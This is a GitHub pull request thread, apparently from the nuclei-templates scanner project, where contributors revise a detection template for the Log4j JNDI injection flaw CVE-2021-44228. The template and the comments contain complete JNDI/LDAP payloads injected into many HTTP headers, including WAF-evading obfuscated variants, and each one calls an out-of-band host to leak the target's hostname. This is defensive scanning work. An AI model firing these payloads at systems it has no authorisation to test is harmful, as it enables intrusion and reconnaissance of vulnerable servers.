
Updated CVE-2021-44228 with most common vulnerable headers #3334

Merged
merged 7 commits into from
Dec 18, 2021

Conversation

Anon-Artist
Contributor

Template / PR Information

The template is updated with the most common headers which can be vulnerable to CVE-2021-44228, including the X-Api-Version header, X-Forwarded headers, etc.

These headers are collected from the above blog, in the Detecting the Vulnerability part.

Template Validation

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)


nuclei

Additional References:

@Anon-Artist Anon-Artist changed the title Updated with common headers which can be exploited Updated CVE-2021-44228 with most common vulnerable headers Dec 13, 2021
Contributor Author

@Anon-Artist Anon-Artist left a comment


Added more headers

@ErwinGeirnaert

Hi, there is a problem with the usage of ${hostName}, shouldn't that be {{Hostname}}?

@ehsandeep
Member

@ErwinGeirnaert ${hostName} is a variable name to be fetched from vulnerable systems and not related to the template.

@Anon-Artist
Contributor Author

I had used the same payload created by @ehsandeep and only added the most common security headers.
So what changes are you proposing, or where should the changes be made?

@ErwinGeirnaert

The JNDI exploit will download code and execute it, not the payload in the URL.

@ErwinGeirnaert

I've changed it to {{Hostname}} and this results in an interaction to interactsh where the hostname that was scanned is added to the DNS request, so you know which hosts are vulnerable.

@ehsandeep
Member

@ErwinGeirnaert there are multiple ways to exploit this and pulling ${hostName} of the vulnerable system is one of them via DNS interaction.

@ErwinGeirnaert

thanks @ehsandeep that is just crazy!!!

Contributor Author

@Anon-Artist Anon-Artist left a comment


Thanks for fixing the lint error, I was busy with some other tasks.

@Anon-Artist
Contributor Author

Hi @geeknik, All mentioned changes are made, and all checks have passed.

Contributor Author

@Anon-Artist Anon-Artist left a comment


Done

cves/2021/CVE-2021-44228.yaml (outdated review thread, resolved)
@ehsandeep
Member

thank you for all the new header additions @Anon-Artist, we might hold this PR for some time due to a known issue in the nuclei engine - projectdiscovery/nuclei#1361 otherwise we will get multiple interactions for the same target.

@Anon-Artist
Contributor Author

Sure @ehsandeep, I will wait to see the PR getting merged.
Thanks

@dogasantos
Contributor

dogasantos commented Dec 13, 2021

@ehsandeep the current template for log4j has a hardcoded interactsh.com server in place. This will fail if we use a custom server.

      - type: regex
        part: interactsh_request
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interact(\.sh|sh\.com)'

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interact(\.sh|sh\.com)'   # Extract ${hostName}

Will {{interactsh-url}} work in the regex field, to make it fully compatible with any private interactsh server?

I guess not, { } are reserved/valid. So I must patch locally to match the private server in the meantime.

@ehsandeep
Member

@dogasantos please see the discussion here - #3330

@xuchaoa

xuchaoa commented Dec 14, 2021

Includes the same header key twice? Maybe delete one?


Contributor Author

@Anon-Artist Anon-Artist left a comment


Avoided duplication suggested by @xuchaoa

@Anon-Artist
Contributor Author

Hi @ehsandeep, I have changed the regex in the matchers and extractors used in the latest update v8.7.3,
i.e. making it compatible with a self-hosted interactsh server.

@meme-lord
Contributor

Another thing that could be changed with this template is adding the name of the header or position into the DNS request. This makes it easier to identify which header the vulnerability triggered in.
Like this:

        GET /?x=${jndi:ldap://${hostName}-url.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}-ua.{{interactsh-url}}}
        Referer: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-ref.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xff.{{interactsh-url}}}
        Authentication: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-auth.{{interactsh-url}}}
        X-Api-Version: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xav.{{interactsh-url}}}
        X-Requested-With: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xrw.{{interactsh-url}}}
        X-Forwarded-Host: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xfh.{{interactsh-url}}}
        Cookie: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-cook.{{interactsh-url}}}
        Origin: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-orig.{{interactsh-url}}}
        Accept: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acpt.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xdc.{{interactsh-url}}}
        Location: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-loc.{{interactsh-url}}}
        Accept-Language: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-al.{{interactsh-url}}}
        Accept-Encoding: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-ae.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-uir.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-xct.{{interactsh-url}}}
        Content-Length: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-cl.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acrm.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}-acrh.{{interactsh-url}}}

@0xceba
Contributor

0xceba commented Dec 17, 2021

I recommend the additional adjustments that are present in the below version:

  • Fix extraction regex to match hostnames with uppercase letters.
  • Standardized the payload. There's no point to include a WAF-bypass payload in the same petition as the default payload.
  • Print the injection point.

id: CVE-2021-44228

info:
  name: Remote code injection in Log4j
  author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
  reference:
    - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
    - https://www.lunasec.io/docs/blog/log4j-zero-day/
    - https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
  tags: cve,cve2021,rce,oast,log4j

requests:
  - raw:
      - |
        GET /?x=${jndi:ldap://${hostName}.url.{{interactsh-url}}/a} HTTP/1.1
        Host: {{Hostname}}
        Accept: ${jndi:ldap://${hostName}.accept.{{interactsh-url}}}
        Accept-Encoding: ${jndi:ldap://${hostName}.acceptencoding.{{interactsh-url}}}
        Accept-Language: ${jndi:ldap://${hostName}.acceptlanguage.{{interactsh-url}}}
        Access-Control-Request-Headers: ${jndi:ldap://${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}
        Access-Control-Request-Method: ${jndi:ldap://${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}
        Authentication: Basic ${jndi:ldap://${hostName}.authenticationbasic.{{interactsh-url}}}
        Authentication: Bearer ${jndi:ldap://${hostName}.authenticationbearer.{{interactsh-url}}}
        Cookie: ${jndi:ldap://${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${hostName}.cookievalue.{{interactsh-url}}}
        Location: ${jndi:ldap://${hostName}.location.{{interactsh-url}}}
        Origin: ${jndi:ldap://${hostName}.origin.{{interactsh-url}}}
        Referer: ${jndi:ldap://${hostName}.referer.{{interactsh-url}}}
        Upgrade-Insecure-Requests: ${jndi:ldap://${hostName}.upgradeinsecurerequests.{{interactsh-url}}}
        User-Agent: ${jndi:ldap://${hostName}.useragent.{{interactsh-url}}}
        X-Api-Version: ${jndi:ldap://${hostName}.xapiversion.{{interactsh-url}}}
        X-CSRF-Token: ${jndi:ldap://${hostName}.xcsrftoken.{{interactsh-url}}}
        X-Druid-Comment: ${jndi:ldap://${hostName}.xdruidcomment.{{interactsh-url}}}
        X-Forwarded-For: ${jndi:ldap://${hostName}.xforwardedfor.{{interactsh-url}}}
        X-Origin: ${jndi:ldap://${hostName}.xorigin.{{interactsh-url}}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

      - type: regex
        part: interactsh_request
        group: 2
        regex:
          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print injection point in output
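To show what each extractor revision discussed in this thread actually recovers from an interactsh DNS callback name, here is an added Python example (not code from the PR or the nuclei-templates project). It runs the old lowercase-only regex quoted by @dogasantos, @0xceba's revised regex and a suffix-aware parser over constructed callback names; the hostnames, the interactsh id `c7d4e2f0abcd` and the private domain `oast.example.org` are made-up values, and the suffix-aware parser is this example's own suggestion, not something the template supports.

```python
import re

# Regex from the earlier template revision (the one dogasantos quoted above):
# lowercase-only hostname and a hardcoded public interact.sh / interactsh.com suffix.
OLD_RE = re.compile(r'([a-z0-9\.\-]+)\.([a-z0-9]+)\.interact(\.sh|sh\.com)')
# Extractor regex from 0xceba's revision above; expected label layout is
# <hostName>.<injection-point>.<interactsh-id>.<interact|interactsh>.<tld>
NEW_RE = re.compile(r'([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+')


def old_hostname(dns_name):
    """Group 1 of the old extractor, or None if the pattern does not match at all."""
    m = OLD_RE.search(dns_name)
    return m.group(1) if m else None


def new_hostname_and_point(dns_name):
    """Groups 1 and 2 of the new extractors: (hostName, injection point)."""
    m = NEW_RE.search(dns_name)
    return (m.group(1), m.group(2)) if m else None


def suffix_aware(dns_name, interactsh_domain):
    """Hypothetical suffix-aware parser for a self-hosted interactsh domain (assumption:
    the operator knows which domain the scan used). Everything left of that domain is
    <hostName labels...>.<injection-point>.<id>, so the hostname may contain dots and
    the server domain may have any number of labels."""
    suffix = "." + interactsh_domain.lower()
    name = dns_name.rstrip(".")
    if not name.lower().endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) < 3:  # need at least hostName, injection point and id
        return None
    return ".".join(labels[:-2]), labels[-2]


# Constructed sample callback names; hosts, id and private domain are made up.
PUBLIC = "WEB-SRV01.xapiversion.c7d4e2f0abcd.interact.sh"
PRIVATE = "app01.corp.example.useragent.c7d4e2f0abcd.oast.example.org"

if __name__ == "__main__":
    print("old regex, uppercase host:", old_hostname(PUBLIC))            # truncated: 01.xapiversion
    print("new regex, public server: ", new_hostname_and_point(PUBLIC))  # ('WEB-SRV01', 'xapiversion')
    print("new regex, deeper domain: ", new_hostname_and_point(PRIVATE)) # injection point absorbed
    print("suffix-aware, private:    ", suffix_aware(PRIVATE, "oast.example.org"))
```

Note that the revised regex still assumes a two-label public suffix: on a self-hosted domain with more labels the greedy first group swallows the injection point, which is why the suffix-aware variant anchors on the known interactsh domain instead.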

@Anon-Artist
Contributor Author

Sure, I will do it, and thanks for the detailed explanation 😀

- more injection points
- a fixed regex to extract uppercase hostnames
- standardized payloads
- printed injection points

Source - https://twitter.com/0xceba/status/1471664540542648322

Co-Authored-By: 0xceba <44234156+0xceba@users.noreply.github.com>
Co-Authored-By: Abhiram V <61599526+Anon-Artist@users.noreply.github.com>
@ehsandeep
Member

thank you @Anon-Artist @0xceba @meme-lord @xuchaoa for all the suggestions and changes, I've updated the PR based on the latest suggestions made by @0xceba, also @Anon-Artist as now we know which header caused the interaction, I believe we can merge this PR as well.

@ehsandeep ehsandeep merged commit dd40419 into projectdiscovery:master Dec 18, 2021
@ehsandeep ehsandeep mentioned this pull request Dec 18, 2021